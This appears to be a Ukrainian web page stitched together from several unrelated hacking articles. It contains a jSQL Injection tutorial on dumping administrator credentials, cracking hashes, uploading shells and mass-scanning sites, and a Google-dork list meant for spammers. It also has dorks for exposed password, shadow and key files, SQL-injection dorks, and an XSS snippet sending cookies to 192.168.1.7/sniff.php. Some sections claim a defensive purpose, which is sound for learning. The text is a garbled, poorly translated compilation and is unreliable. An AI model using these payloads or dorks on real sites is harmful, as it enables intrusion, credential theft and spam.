Головна  /  Роутери  /  Використовуємо маловідомі функції Google, щоб знайти приховане. Інструкція з використання jSQL Injection — багатофункціональний інструмент пошуку та експлуатації SQL-ін'єкцій у Kali Linux Як захистити себе від злому через Google

Використовуємо маловідомі функції Google, щоб знайти приховане. Інструкція з використання jSQL Injection — багатофункціональний інструмент пошуку та експлуатації SQL-ін'єкцій у Kali Linux Як захистити себе від злому через Google

Роутери
11.01.2022

Запустіть завантажений файл подвійним кліком (потрібно мати віртуальну машину ).

3. Анонімність під час перевірки сайту на SQL-ін'єкції
Налаштування Torта Privoxy у Kali Linux

[Розділ у розробці]

Налаштування Tor та Privoxy у Windows

[Розділ у розробці]

Налаштування роботи через проксі в jSQL Injection

[Розділ у розробці]

4. Перевірка сайту на SQL-ін'єкції з jSQL Injection

Робота з програмою вкрай проста. Достатньо ввести адресу сайту та натиснути ENTER.

На наступному скріншоті видно, що сайт вразливий відразу до трьох видів SQL-ін'єкцій (інформація про них вказана в нижньому правому кутку). Клікаючи на назви ін'єкцій можна переключити метод, що використовується:

Також нам вже виведено наявні бази даних.

Можна переглянути вміст кожної таблиці:

Зазвичай найцікавішим у таблицях є облікові дані адміністратора.

Якщо вам пощастило і ви знайшли дані адміністратора, то радіти рано. Потрібно ще знайти адмінку, куди ці дані вводити.

5. Пошук адмінок з jSQL Injection

Для цього переходьте до наступної вкладки. Тут нас зустрічає перелік можливих адрес. Ви можете вибрати одну або кілька сторінок для перевірки:

Зручність у тому, що не потрібно використовувати інші програми.

На жаль, недбайливих програмістів, які зберігають паролі у відкритому вигляді, не дуже багато. Досить часто в рядку пароля ми бачимо щось на зразок

8743b52063cd84097a65d1633f5c74f5

Це хеш. Розшифрувати його можна брутфорсом. І… jSQL Injection має вбудований брутфорсер.

6. Брутфорсинг хешей за допомогою jSQL Injection

Безсумнівною зручністю є те, що не потрібно шукати інші програми. Тут є підтримка багатьох найпопулярніших хешей.

Це не самий оптимальний варіант. Для того, щоб стати гуру у розшифровці хешей, рекомендується Книга « » російською мовою.

Але, звичайно, коли під рукою немає іншої програми або немає часу на вивчення, jSQL Injection із вбудованою функцією брут-форсу буде дуже доречним.

Існують настройки: можна задати які символи входять у пароль, діапазон довжини пароля.

7. Операції з файлами після виявлення SQL-ін'єкцій

Крім операцій з базами даних - їх читання та модифікація, у разі виявлення SQL-ін'єкцій можливе виконання таких файлових операцій:

  • читання файлів на сервері
  • вивантаження нових файлів на сервер
  • вивантаження шеллів на сервер

І все це реалізовано у jSQL Injection!

Є обмеження – у SQL-сервера мають бути файлові привілеї. У розумних системних адміністраторіввони вимкнені і доступу до файлової системи отримати не вдасться.

Наявність файлових привілеїв досить просто перевірити. Перейдіть до однієї із вкладок (читання файлів, створення шелла, завантаження нового файлу) і спробуйте виконати одну із зазначених операцій.

Ще дуже важливе зауваження – нам потрібно знати точний абсолютний шлях до файлу з яким ми будемо працювати – інакше нічого не вийде.

Подивіться на наступний скріншот:

На будь-яку спробу операції з файлом відповідають: No FILE privilege (немає файлових привілеїв). І нічого тут вдіяти не можна.

Якщо натомість у вас інша помилка:

Problem writing into [назва_каталогу]

Це означає, що ви неправильно вказали абсолютний шлях, до якого потрібно записувати файл.

Для того щоб припустити абсолютний шлях, потрібно, як мінімум, знати операційну систему на якій працює сервер. Для цього перейдіть до вкладки Network.

Такий запис (рядок Win64) дає підстави припустити, що ми маємо справу з ОС Windows:

Keep-Alive: timeout=5, max=99 Server: Apache/2.4.17 (Win64) PHP/7.0.0RC6 Connection: Keep-Alive Метод: HTTP/1.1 200 OK Content-Length: 353 Date: Fri, 11 Dec 201 11:48:31 GMT X-Powered-By: PHP/7.0.0RC6 Content-Type: text/html; charset=UTF-8

Тут у нас якийсь із Unix (*BSD, Linux):

Transfer-Encoding: chunked Дата: Fri, 11 Dec 2015 11:57:02 GMT Метод: HTTP/1.1 200 OK Keep-Alive: timeout=3, max=100 Connection: keep-alive Content-Type: text/html X- Powered-By: PHP/5.3.29 Server: Apache/2.2.31 (Unix)

А тут у нас CentOS:

Метод: HTTP/1.1 200 OK Expires: Thu, 19 Nov 1981 08:52:00 GMT Set-Cookie: PHPSESSID=9p60gtunrv7g41iurr814h9rd0; path=/ Connection: keep-alive X-Cache-Lookup: MISS від t1.hoster.ru:6666 Server: Apache/2.2.15 (CentOS) t1.hoster.ru Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Transfer-Encoding: chunked Content-Type: text/html; charset=WINDOWS-1251

У Windows типовою папкою для сайтів є C:\Server\data\htdocs\. Але, насправді, якщо хтось «додумався» робити сервер на Windows, то, можливо, ця людина нічого не чула про привілеї. Тому розпочинати спроби варто прямо з каталогу C:/Windows/:

Як бачимо, все пройшло чудово з першого разу.

Але самі шелли jSQL Injection у мене викликають сумніви. Якщо є файлові привілеї, то ви можете завантажити що-небудь з веб-інтерфейсом.

8. Масова перевірка сайтів на SQL-ін'єкції

І навіть ця функція є у jSQL Injection. Все просто - завантажуєте список сайтів (можна імпортувати з файлу), вибираєте ті, які хочете перевірити і натискаєте відповідну кнопку для початку операції.

Висновок з jSQL Injection

jSQL Injection – хороший, потужний інструмент для пошуку та подальшого використання знайдених на сайтах SQL-ін'єкцій. Його безперечні плюси: простота використання, вбудовані супутні функції. jSQL Injection може стати найкращим другом новачка під час аналізу веб-сайтів.

З недоліків я б наголосив на неможливості редагування баз даних (принаймні я цього функціоналу не знайшов). Як і всі інструменти з графічним інтерфейсом, до недоліків цієї програми можна приписати неможливість використання в скриптах. Проте деяка автоматизація можлива і в цій програмі завдяки вбудованій функції масової перевірки сайтів.

Програмою jSQL Injection користуватися значно зручніше ніж sqlmap. Але sqlmap підтримує більше видів SQL-ін'єкцій, має опції для роботи з файловими брандмауерами і деякі інші функції.

Підсумок: jSQL Injection — найкращий друг хакера-початківця.

Довідку про цю програму в Енциклопедії Kali Linux ви знайдете на цій сторінці: http://kali.tools/?p=706

Як правильно шукати за допомогою google.com

Всі напевно вміють користуватися такою пошуковою системою, як Google =) Але не всі знають, що якщо грамотно скласти пошуковий запитза допомогою спеціальних конструкцій, то можна досягти результатів того, що Ви шукаєте набагато ефективніше і швидше =) У цій статті я постараюся показати, що і як Вам потрібно робити, щоб шукати правильно

Google підтримує кілька розширених операторів пошуку, які мають особливе значення при пошуку на google.com. Типово, ці оператори змінюють пошук, або навіть говорять гуглу робити абсолютно різні типи пошуку. Наприклад, конструкція link: є спеціальним оператором, та запит link:www.google.comне дасть вам нормального пошуку, але натомість знайде всі web-сторінки, які мають зв'язки до google.com.
альтернативні типи запитів

cache: Якщо Ви будете включати інші слова в запит, то Google підсвітить ці включені слова в межах документа, що кешується.
Наприклад, cache:www.сайт webпокаже вміст, що кешується, з підсвіченим словом "web".

link: пошуковий запит, що розглядається вище, покаже веб-сторінки, на яких містяться посилання до зазначеного запиту.
Наприклад: link:www.сайтвідобразить усі сторінки, на яких є посилання на http://www.сайт

related: Відобразить веб-сторінки, які є "подібними" (related) вказаній веб-сторінці.
Наприклад, related: www.google.comперерахує web-сторінки, які є подібними до домашньої сторінки Google.

info: Інформація запиту: представить небагато інформації, яку Google має про запитувану web-сторінку.
Наприклад, info:сайтпокаже інформацію про наш форум =) (Армада - Форум адалт вебмайстрів).

Інші інформаційні запити

define: Запит define: забезпечить визначення слів, які Ви вводите після того, як це зібрано з різних мережевих джерел. Визначення буде для всієї введеної фрази (тобто це включатиме всі слова в точний запит).

stocks: Якщо ви починаєте запит із stocks: Google обробить решту термінів запиту як символи біржових зведень, і зв'яжеться зі сторінкою, що показує готову інформацію для цих символів.
Наприклад, stocks: Intel yahooпокаже інформацію про Intel та Yahoo. (Зазначте, що Ви повинні надрукувати символи останніх новин, не назва компанії)

Модифікатори запитів

site: Якщо ви включаєте site: у ваш запит, Google обмежить результати тими вебсайтами, які знайде в цьому домені.
Також можна шукати і по окремих зонах, як ru, org, com, etc ( site:com site:ru)

allintitle: Якщо ви запускаєте запит з allintitle:, Google обмежить результати з усіма словами запиту в заголовку.
Наприклад, allintitle: google searchповерне всі сторінки гугла з пошуку як images, Blog, etc

intitle: Якщо Ви включаєте intitle: у вашому запиті, Google обмежить результати документами, що містять слово в заголовку.
Наприклад, intitle:Бізнес

allinurl: Якщо ви запускаєте запит з allinurl: Google обмежить результати, з усіма словами запиту в URL.
Наприклад, allinurl: google searchповерне документи з google та search у заголовку. Також як варіант можна розділяти слова слешем (/) тоді слова по обидва боки слеша шукатимуться в межах однієї сторінки: Приклад allinurl: foo/bar

inurl: Якщо ви включаєте inurl: у вашому запиті, Google обмежить результати документами, що містять слово в URL.
Наприклад, Animation inurl:сайт

intext: шукає тільки в тексті сторінки вказане слово, ігноруючи назву та тексти посилань, та інше, що не стосується. Є також і похідна цього модифікатора - allintext: тобто. далі всі слова в запиті будуть шукатися тільки в тексті, що теж буває важливо, ігноруючи слова, що часто використовуються в посиланнях
Наприклад, intext:форум

daterange: шукає у тимчасових рамках (daterange:2452389-2452389), дати для часу вказуються в юліанському форматі.

Ну і ще всякі цікаві приклади запитів

Приклади складання запитів для Google. Для спамерів

Inurl:control.guest?a=sign

Site:books.dreambook.com “Homepage URL” “Sign my” inurl:sign

Site:www.freegb.net Homepage

Inurl:sign.asp Character Count

“Message:” inurl:sign.cfm “Sender:”

Inurl:register.php “User Registration” “Website”

Inurl:edu/guestbook “Sign the Guestbook”

Inurl:post “Post Comment” “URL”

Inurl:/archives/ “Comments:” “Remember info?”

“Script and Guestbook Created by:” “URL:” “Comments:”

Inurl:?action=add “phpBook” “URL”

Intitle:"Submit New Story"

Журнали

Inurl:www.livejournal.com/users/ mode=reply

Inurl greatestjournal.com/mode=reply

Inurl:fastbb.ru/re.pl?

Inurl:fastbb.ru/re.pl? "Гостьова книга"

Блоги

Inurl:blogger.com/comment.g?"postID""anonymous"

Inurl:typepad.com/ “Post a comment” “Remember personal info?”

Inurl:greatestjournal.com/community/ “Post comment” “addresses of anonymous posters”

"Post comment" "addresses of anonymous posters" -

Intitle:"Post comment"

Inurl:pirillo.com “Post comment”

Форуми

Inurl:gate.html?”name=Forums” “mode=reply”

Inurl: "forum/posting.php?mode=reply"

Inurl: "mes.php?"

Inurl: "members.html"

Inurl:forum/memberlist.php?”

Злом за допомогою Google

Alexander Antipov

Пошукова система Google (www.google.com) надає багато можливостей для пошуку. Всі ці можливості - неоціненний інструмент пошуку для користувача вперше потрапив в Інтернет і в той же час ще потужніша зброя вторгнення і руйнування в руках людей зі злими намірами, включаючи не тільки хакерів, а й некомп'ютерних злочинців і навіть терористів.
(9475 переглядів за 1 тиждень)


Денис Батранков
denisNOSPAMixi.ru

Увага: Ця стаття не є керівництвом до дії. Ця стаття написана для Вас, адміністратори WEB серверів, щоб у Вас зникло хибне відчуття, що Ви в безпеці, і Ви нарешті зрозуміли підступність цього методу отримання інформації та взялися за захист свого сайту.

Вступ

Я, наприклад, за 0.14 секунди знайшов 1670 сторінок!

2. Введемо інший рядок, наприклад:

inurl:"auth_user_file.txt"

трохи менше, але цього вже достатньо для вільного скачування та для підбору паролів (за допомогою того ж таки John The Ripper). Нижче я наведу ще низку прикладів.

Отже, Вам треба усвідомити, що пошукова машина Google відвідала більшість із сайтів Інтернету і зберегла в кеші інформацію, що міститься на них. Ця кешована інформація дозволяє отримати інформацію про сайт і вміст сайту без прямого підключення до сайту, лише копаючись у тій інформації, яка зберігається всередині Google. Причому якщо інформація на сайті вже недоступна, то інформація в кеші ще, можливо, збереглася. Все, що потрібно для цього методу: знати деякі ключові слова Google. Цей технічний прийом називається Google Hacking.

Вперше інформація про Google Hacking з'явилася на розсилці Bugtruck ще три роки тому. У 2001 році цю тему було піднято одним французьким студентом. Ось посилання на цей лист http://www.cotse.com/mailing-lists/bugtraq/2001/Nov/0129.html. У ньому наведено перші приклади таких запитів:

1) Index of /admin
2) Index of /password
3) Index of /mail
4) Index of / +banques +filetype:xls (for france...)
5) Index of / +passwd
6) Index of/password.txt

Нашуміла ця тема в англо-читальній частині Інтернету зовсім недавно: після статті Johnny Long, що вийшла 7 травня 2004 року. Для більш повного вивчення Google Hacking раджу зайти на сайт цього автора http://johnny.ihackstuff.com. У цій статті я хочу ввести вас у курс справи.

Ким це може бути використано:
- Журналісти, шпигуни та всі ті люди, хто любить пхати носа не у свої справи, можуть використовувати це для пошуку компромату.
- Хакери, які розшукують потрібні цілі для злому.

Як працює Google.

Для продовження розмови нагадаю деякі з ключових слів, які використовуються у запитах Google.

Пошук за допомогою знака +

Google виключає із пошуку неважливі, на його думку, слова. Наприклад запитальні слова, прийменники та артиклі в англійською: наприклад are, of, where. У руському мовою Googleсхоже, всі слова вважає важливими. Якщо слово виключається з пошуку, Google пише про це. Щоб Google почав шукати сторінки з цими словами перед ними, потрібно додати знак + без пробілу перед словом. Наприклад:

ace +of base

Пошук за допомогою знаку –

Якщо Google знаходить велику кількість сторінок, з яких необхідно виключити сторінки з певною тематикою, можна змусити Google шукати тільки сторінки, на яких немає певних слів. Для цього треба вказати ці слова, поставивши перед кожним знак без пробілу перед словом. Наприклад:

рибалка-горілка

Пошук за допомогою знака ~

Можливо, що ви захочете знайти не лише вказане слово, але також його синоніми. Для цього перед словом вкажіть символ ~.

Пошук точної фрази за допомогою подвійних лапок

Google шукає на кожній сторінці всі входження слів, які ви написали в рядку запиту, причому йому не має значення взаємне розташування слів, головне щоб усі зазначені слова були на сторінці одночасно (це дія за умовчанням). Щоб знайти точну фразу – її треба взяти у лапки. Наприклад:

"підставка для книг"

Щоб було хоч одне із зазначених слів, потрібно вказати логічну операцію явно: OR. Наприклад:

книга безпека OR захист

Крім того, у рядку пошуку можна використовувати знак * для позначення будь-якого слова і. для позначення будь-якого символу.

Пошук слів за допомогою додаткових операторів

Існують пошукові оператори, які вказуються у рядку пошуку у форматі:

operator:search_term

Прогалини поруч із двокрапкою не потрібні. Якщо ви вставите пробіл після двокрапки, то побачите повідомлення про помилку, а перед ним, Google буде використовувати їх як звичайний рядок для пошуку.
Існують групи додаткових операторів пошуку: мови - вказують якою мовою ви хочете побачити результат, дата - обмежують результати за минулі три, шість або 12 місяців, входження - вказують де документа потрібно шукати рядок: скрізь, в заголовку, в URL, домени - здійснювати пошук за вказаним сайтом або навпаки виключити його з пошуку, безпечний пошук- блокують сайти, що містять зазначений тип інформації та видаляють їх зі сторінок результатів пошуку.
При цьому деякі оператори не потребують додаткового параметра, наприклад запит cache:www.google.com може бути викликаний, як повноцінний рядок для пошуку, а деякі ключові слова, навпаки, вимагають наявності слова для пошуку, наприклад site:www. google.com help". У світлі нашої тематики подивимося на наступні оператори:

Оператор

Опис

Вимагає додаткового параметра?

пошук тільки за вказаним у search_term сайту

пошук лише у документах з типом search_term

знайти сторінки, які містять search_term у заголовку

знайти сторінки, які містять усі слова search_term у заголовку

знайти сторінки, які містять слово search_term у своїй адресі

знайти сторінки, які містять усі слова search_term у своїй адресі

Оператор site: обмежує пошук лише за вказаним сайтом, причому можна вказати не лише доменне ім'я, але й IP адресу. Наприклад, введіть:

Оператор filetype: обмежує пошук у файлах певного типу. Наприклад:

На дату виходу статті Googlе може шукати всередині 13 різних форматів файлів:

  • Adobe Portable Document Format (pdf)
  • Adobe PostScript (ps)
  • Lotus 1-2-3 (wk1, wk2, wk3, wk4, wk5, wki, wks, wku)
  • Lotus WordPro (lwp)
  • MacWrite (mw)
  • Microsoft Excel(xls)
  • Microsoft PowerPoint(ppt)
  • Microsoft Word(doc)
  • Microsoft Works (wks, wps, wdb)
  • Microsoft Write (wri)
  • Rich Text Format (RTF)
  • Shockwave Flash(swf)
  • Text (ans, txt)

Оператор link: показує всі сторінки, які вказують на цю сторінку.
Напевно, завжди цікаво подивитися, як багато місць в Інтернеті знають про тебе. Пробуємо:

Оператор cache: показує версію сайту в кеші Google, як вона виглядала, коли Google останнійвкотре відвідував цю сторінку. Беремо будь-який сайт, що часто змінюється, і дивимося:

Оператор intitle: шукає вказане слово у заголовку сторінки. Оператор allintitle: є розширенням – він шукає всі зазначені кілька слів у заголовку сторінки. Порівняйте:

intitle:політ на марс
intitle:політ intitle:на intitle:марс
allintitle: політ на марс

Оператор inurl: змушує Google показати всі сторінки, що містять в URL зазначений рядок. Оператор allinurl: шукає усі слова в URL. Наприклад:

allinurl:acid acid_stat_alerts.php

Ця команда особливо корисна для тих, хто не має SNORT – хоч зможуть подивитися, як він працює на реальній системі.

Методи злому за допомогою Google

Отже, ми з'ясували, що, використовуючи комбінацію перелічених вище операторів і ключових слів, будь-яка людина може зайнятися збором потрібної інформації та пошуком уразливостей. Ці технічні методи часто називають Google Hacking.

Карта сайту

Можна використовувати оператор site: щоб переглянути всі посилання, які Google знайшов на сайті. Зазвичай сторінки, які динамічно створюються скриптами, за допомогою параметрів не індексуються, тому деякі сайти використовують ISAPI фільтри, щоб посилання були не у вигляді /article.asp?num=10&dst=5 , а зі слішами /article/abc/num/10/ dst/5. Це зроблено для того, щоб сайт взагалі індексувався пошуковими системами.

Спробуємо:

site:www.whitehouse.gov whitehouse

Google вважає, що кожна сторінка сайту містить слово whitehouse. Цим ми користуємося, щоб отримати всі сторінки.
Є й спрощений варіант:

site:whitehouse.gov

І що найприємніше - товариші з whitehouse.gov навіть не дізналися, що ми подивилися на структуру їхнього сайту і навіть заглянули в кешовані сторінки, які завантажив Google. Це може бути використане для вивчення структури сайтів і перегляду вмісту, залишаючись непоміченим до певного часу.

Перегляд списку файлів у каталогах

WEB-сервери можуть показувати списки директорій сервера замість звичайних HTML сторінок. Зазвичай це робиться для того, щоб користувачі вибирали та завантажували певні файли. Однак у багатьох випадках адміністратори не мають на меті показати вміст директорії. Це виникає внаслідок неправильної конфігурації сервера чи відсутності головної сторінкиу директорії. В результаті у хакера з'являється шанс знайти щось цікаве в директорії і скористатися цим для своїх цілей. Щоб знайти всі такі сторінки, достатньо помітити, що вони містять у своєму заголовку слова: index of. Але оскільки слова index of містять не лише такі сторінки, то потрібно уточнити запит та врахувати ключові слова на самій сторінці, тому нам підійдуть запити виду:

intitle:index.of parent directory
intitle:index.of name size

Оскільки в основному лістинги директорій зроблено навмисно, то вам, можливо, важко буде знайти помилково виведені лістинги з першого разу. Але принаймні ви вже зможете використовувати листинги для визначення версії WEB сервера, як описано нижче.

Отримання версії WEB-сервера.

Знання версії WEB сервера завжди корисне перед початком будь-якої атаки хакера. Знову ж таки завдяки Google можна отримати цю інформацію без підключення до сервера. Якщо уважно подивитися на лістинг директорії, можна побачити, що там виводиться ім'я WEB сервера та його версія.

Apache1.3.29 - ProXad Server на trf296.free.fr Port 80

Досвідчений адміністратор може підмінити цю інформацію, але зазвичай вона відповідає істині. Таким чином, щоб отримати цю інформацію достатньо надіслати запит:

intitle:index.of server.at

Щоб отримати інформацію для конкретного сервера, уточнюємо запит:

intitle:index.of server.at site:ibm.com

Або навпаки шукаємо сервери, що працюють на певній версії сервера:

intitle:index.of Apache/2.0.40 Server at

Ця техніка може бути використана хакером для пошуку жертви. Якщо у нього, наприклад, є експлойт для певної версії WEB сервера, він може знайти його і спробувати наявний експлойт.

Також можна отримати версію сервера, переглядаючи сторінки, які за замовчуванням встановлюються під час встановлення свіжої версії сервера WEB. Наприклад, щоб побачити тестову сторінку Apache 1.2.6, достатньо набрати

intitle:Test.Page.for.Apache it.worked!

Мало того, деякі Операційні системипри встановленні відразу ставлять та запускають WEB сервер. При цьому деякі користувачі навіть про це не підозрюють. Звичайно якщо ви побачите, що хтось не видалив сторінку за замовчуванням, то логічно припустити, що комп'ютер взагалі не піддавався будь-якій настройці і, ймовірно, вразливий для атак.

Спробуйте знайти сторінки IIS 5.0

allintitle:Welcome to Windows 2000 Internet Services

Що стосується IIS можна визначити як версію сервера, а й версію Windowsта Service Pack.

Ще одним способом визначення версії WEB сервера є пошук посібників (сторінок підказок) та прикладів, які можуть бути встановлені на сайті за умовчанням. Хакери знайшли багато способів використовувати ці компоненти, щоб отримати привілейований доступ до сайту. Ось тому потрібно на бойовому веб-сайті видалити ці компоненти. Не кажучи вже про те, що за наявністю цих компонентів можна отримати інформацію про тип сервера та його версію. Наприклад, знайдемо посібник з apache:

inurl:manual apache directives modules

Використання Google як CGI сканера.

CGI сканер або WEB сканер – утиліта для пошуку вразливих скриптів та програм на сервері жертви. Ці утиліти повинні знати що шукати, для цього вони мають цілий список вразливих файлів, наприклад:

/cgi-bin/cgiemail/uargg.txt
/random_banner/index.cgi
/random_banner/index.cgi
/cgi-bin/mailview.cgi
/cgi-bin/maillist.cgi
/cgi-bin/userreg.cgi

/iissamples/ISSamples/SQLQHit.asp
/SiteServer/admin/findvserver.asp
/scripts/cphost.dll
/cgi-bin/finger.cgi

Ми може знайти кожен з цих файлів з допомогою Google, використовуючи додатково з ім'ям файлу в рядку пошуку слова index of або inurl: ми можемо знайти сайти з уразливими скриптами, наприклад:

allinurl:/random_banner/index.cgi

Користуючись додатковими знаннями, хакер може використовувати вразливість скрипта і за допомогою цієї вразливості змусити скрипт видати будь-який файл, що зберігається на сервері. Наприклад, файл паролів.

Як захистити себе від злому через Google 1. Не викладайте важливі дані на сервер WEB.

Навіть якщо ви виклали дані тимчасово, ви можете забути про це або хтось встигне знайти і забрати ці дані поки ви їх не стерли. Не робіть так. Є багато інших способів передачі, що захищають їх від крадіжки.

2. Перевірте свій веб-сайт.

Використовуйте описані методи для дослідження свого сайту. Періодично перевіряйте свій сайт новими методами, які з'являються на сайті http://johnny.ihackstuff.com. Пам'ятайте, що якщо ви хочете автоматизувати свої дії, потрібно отримати спеціальний дозвіл від Google. Якщо уважно прочитати http://www.google.com/terms_of_service.html, то ви побачите фразу: Ви не можете автоматично приймати будь-які пошуки в будь-який sort to Google's система без express permission in advance from Google.

3. Можливо, вам не потрібно, щоб Google індексував ваш сайт або його частину.

Google дозволяє видалити посилання на свій сайт або його частину своєї бази, а також видалити сторінки з кешу. Крім того ви можете заборонити пошук зображень на вашому сайті, заборонити показувати короткі фрагменти сторінок у результатах пошуку Всі можливості видалення сайту описані на сранці http://www.google.com/remove.html. Для цього ви повинні підтвердити, що ви дійсно власник цього сайту або вставити на сторінку теги або

4. Використовуйте robots.txt

Відомо, що пошукові машини заглядають у файл robots.txt що лежить у корені сайту і не індексують ті частини, які позначені словом Disallow. Ви можете скористатися цим, щоб частина сайту не індексувалася. Наприклад, щоб не індексувався весь сайт, створіть файл robots.txt, який містить два рядки:

User-agent: *
Disallow: /

Що ще буває

Щоб життя вам медом не здавалося, скажу насамкінець, що існують сайти, які стежать за тими людьми, які, використовуючи вищевикладені методи, розшукують дірки у скриптах та WEB серверах. Прикладом такої сторінки є

Додаток.

Трохи солодкого. Спробуйте самі щось із наступного списку:

1. #mysql dump filetype:sql - пошук дампів баз даних mySQL
2. Host Vulnerability Summary Report – покаже вам які вразливості знайшли інші люди
3. phpMyAdmin running on inurl:main.php - це змусить закрити керування через панель phpmyadmin
4. not for distribution confidential
5. Request Details Control Tree Server Variables
6. Running in Child mode
7. Цей report was generated by WebLog
8. intitle:index.of cgiirc.config
9. filetype:conf inurl:firewall -intitle:cvs - може кому потрібні файли кофігурації файрволів? :)
10. intitle:index.of finances.xls - мда.
11. intitle:Index of dbconvert.exe chats – логі icq чату
12. intext:Tobias Oetiker traffic analysis
13. intitle:Usage Statistics for Generated by Webalizer
14. intitle:statistics of advanced web statistics
15. intitle:index.of ws_ftp.ini - конфіг ws ftp
16. inurl:ipsec.secrets holds shared secrets – секретний ключ – гарна знахідка
17. inurl:main.php Welcome to phpMyAdmin
18. inurl:server-info Apache Server Information
19. site:edu admin grades
20. ORA-00921: unexpected end of SQL command – отримуємо шляхи
21. intitle:index.of trillian.ini
22. intitle:Index of pwd.db
23. intitle:index.of people.lst
24. intitle:index.of master.passwd
25. inurl:passlist.txt
26. intitle:Index of .mysql_history
27. intitle:index of intext:globals.inc
28. intitle:index.of administrators.pwd
29. intitle:Index.of etc shadow
30. intitle:index.of secring.pgp
31. inurl:config.php dbuname dbpass
32. inurl:perform filetype:ini

  • "Hacking mit Google"

    • Навчальний центр "Інформзахист" http://www.itsecurity.ru - провідний спеціалізований центр у галузі навчання інформаційної безпеки (Ліцензія Московського Комітету освіти №015470, Державна акредитація №004251). Єдиний авторизований навчальний центркомпаній Internet Security Systems і Clearswift на території Росії та країн СНД. Авторизований навчальний центр компанії Microsoft (спеціалізація Security). Програми навчання узгоджено з Держтехкомісією Росії, ФСБ (ФАПСІ). Свідоцтва про навчання та державні документи щодо підвищення кваліфікації.

    Компанія SoftKey - це унікальний сервіс для покупців, розробників, дилерів та афіліат-партнерів. Крім того, це один з найкращих Інтернет-магазинівПЗ у Росії, Україні, Казахстані, який пропонує покупцям широкий асортимент, безліч способів оплати, оперативну (часто миттєву) обробку замовлення, відстеження процесу виконання замовлення в персональному розділі, різні знижки від магазину та виробників ПЗ.

    Я вирішив трохи розповісти про інформаційну безпеку. Стаття буде корисна програмістам-початківцям і тим, хто тільки-но почав займатися Frontend-розробкою. В чому проблема?

    Багато розробників-початківців так захоплюються написанням коду, що зовсім забувають про безпеку своїх робіт. І що найголовніше – забувають про такі вразливості, як запит SQL, XXS. А ще вигадують легкі паролі для своїх адміністративних панелей і піддаються брутфорсу. Що це за атаки та як можна їх уникнути?

    SQL-ін'єкція

    SQL-ін'єкція - це найпоширеніший вид атаки на базу даних, що здійснюється при SQL-запиті для конкретної СУБД. Від таких атак страждає багато людей і навіть великих компаній. Причина - помилка розробника під час написання бази даних і, власне, SQL-запросов.

    Атака типу впровадження SQL можлива через некоректну обробку вхідних даних, що використовуються в SQL-запитах. При вдалому проходженні атаки з боку хакера ви ризикуєте втратити не тільки вміст баз даних, але й паролі та логи адміністративної панелі. А цих даних буде цілком достатньо, щоб повністю заволодіти сайтом або внести до нього незворотні корективи.

    Атака може бути успішно відтворена в сценаріях, написаних на PHP, ASP, Perl та інших мовах. Успішність таких атак більше залежить від того, яка використовується СУБД та як реалізований сам сценарій. У світі багато вразливих сайтів для SQL-ін'єкцій. У цьому легко переконатись. Достатньо ввести «доріжки» - це спеціальні запити щодо пошуку вразливих сайтів. Ось деякі з них:

    • inurl:index.php?id=
    • inurl:trainers.php?id=
    • inurl:buy.php?category=
    • inurl:article.php?ID=
    • inurl:play_old.php?id=
    • inurl:declaration_more.php?decl_id=
    • inurl:pageid=
    • inurl:games.php?id=
    • inurl:page.php?file=
    • inurl:newsDetail.php?id=
    • inurl:gallery.php?id=
    • inurl:article.php?id=

    Як ними користуватися? Достатньо ввести їх у пошукову систему Google або Яндекс. Пошуковик видасть вам не просто вразливий сайт, а й сторінку на цю вразливість. Але ми не будемо на цьому зупинятися і переконаємося, що сторінка справді вразлива. Для цього достатньо після значення "id=1" поставити одинарну лапку "'". Якось так:

    • inurl:games.php?id=1’

    І сайт нам видасть помилку про запит SQL. Що ж потрібно далі нашому хакеру?

    А далі йому потрібне це посилання на сторінку з помилкою. Потім робота над уразливістю здебільшого відбувається у дистрибутиві "Kali linux" з його утилітами з цієї частини: впровадження ін'єкційного коду та виконання необхідних операцій. Як це відбуватиметься, я вам не можу сказати. Але про це можна знайти інформацію в Інтернеті.

    XSS Атака

    Цей вид атаки здійснюється на файли Cookies. Їх, у свою чергу, дуже люблять зберігати користувачі. А чому ні? Як же без них? Адже завдяки Cookies ми не вбиваємо сто разів пароль від Vk.com чи Mail.ru. І мало тих, хто від них відмовляється. Але в інтернеті для хакерів часто фігурує правило: коефіцієнт зручності прямо пропорційний коефіцієнту небезпеки.

    Для реалізації XSS-атаки нашому хакеру потрібне знання JavaScript. Мова на перший погляд дуже проста і нешкідлива, тому що не має доступу до ресурсів комп'ютера. Працювати з JavaScript хакер може лише у браузері, але й цього достатньо. Адже головне ввести код на веб-сторінку.

    Детально говорити про процес атаки я не стану. Розкажу лише основи та зміст того, як це відбувається.

    Хакер може додати на якийсь форум або гостьову книгу JS-код:

    document.location.href = "http://192.168.1.7/sniff.php?test"

    Скрипти переадресують нас на заражену сторінку, де буде виконуватися код: будь то сніффер, якесь сховище або експлоїд, який так чи інакше викраде наші Cookies з кешу.

    Чому саме JavaScript? Тому що JavaScript відмінно працює з веб-запитами і має доступ до Cookies. Але якщо наш скрипт буде переводити нас на якийсь сайт, то користувач легко помітить. Тут же хакер застосовує хитріший варіант - просто вписує код у картинку.

    Img=new Image();

    Img.src=” http://192.168.1.7/sniff.php?”+document.cookie;

    Ми просто створюємо зображення та приписуємо йому як адресу наш сценарій.

    Як уберегтися від цього? Дуже просто – не переходьте за підозрілими посиланнями.

    DoS та DDos Атаки

    DoS (від англ. Denial of Service - відмова в обслуговуванні) - хакерська атака на обчислювальну систему з метою привести її до відмови. Це створення таких умов, за яких сумлінні користувачі системи не можуть отримати доступ до системних ресурсів (серверів), що надаються, або цей доступ утруднений. Відмова системи може бути кроком до її захоплення, якщо у позаштатній ситуації ПЗ видає будь-яку критичну інформацію: наприклад, версію, частина програмного кодута ін Але найчастіше це міра економічного тиску: втрата простої служби, що приносить дохід. Рахунки від провайдера або заходи щодо уникнення атаки відчутно б'ють «мету» по кишені. В даний час DoS і DDoS-атаки найбільш популярні, так як дозволяють довести до відмови практично будь-яку систему, не залишаючи юридично значущих доказів.

    Чим відрізняється DoS від DDos атаки?

    DoS це атака, побудована розумним способом. Наприклад, якщо сервер не перевіряє коректність вхідних пакетів, хакер може зробити такий запит, який буде оброблятися вічно, а на роботу з іншими з'єднаннями не вистачить процесорного часу. Відповідно клієнти отримають відмову в обслуговуванні. Але перевантажити або вивести з ладу у такий спосіб великі відомі сайти не вдасться. У них на озброєнні стоять досить широкі канали та надпотужні сервери, які без проблем справляються з таким перевантаженням.

